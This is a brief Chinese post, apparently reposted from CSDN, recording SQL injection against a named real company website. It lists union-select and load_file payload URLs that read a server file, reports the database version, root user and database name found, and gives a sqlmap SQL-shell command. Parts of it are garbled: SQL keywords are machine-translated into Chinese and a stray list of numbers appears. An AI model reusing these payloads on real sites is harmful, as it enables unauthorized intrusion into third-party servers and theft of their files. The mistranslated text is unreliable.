登录后复制
http://www.cowinbio.com/
属于mysql4.0,注入实例
路径:/usr/local/webroot/cw/product/introduction.php
mywebmanage/conn.php
http://www.cowinbio.com/product/introduction.php?id=-65 Union select load_file(\’/usr/local/webroot/cw/product/introduction.php\’),2
http://www.cowinbio.com/product/introduction.php?id=65%20order%20by%202
http://www.cowinbio.com/product/introduction.php?id=65 联合选择1,2
版本():4.1.22 – 标准
用户():root@localhost
数据库():cw
http://www.cowinbio.com/product/introduction.php?id=65 联合选择1,2
加载文件()
sqlmap -u URL注入地址–sql-shell 执行SQL命令
mysql5.0
输出文件
信息
1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21.22.23.24.25.26.27.28.29.30.31.32.33。
#实战渗透测试——以上mysql4.0部署相关内容来源仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92638.html
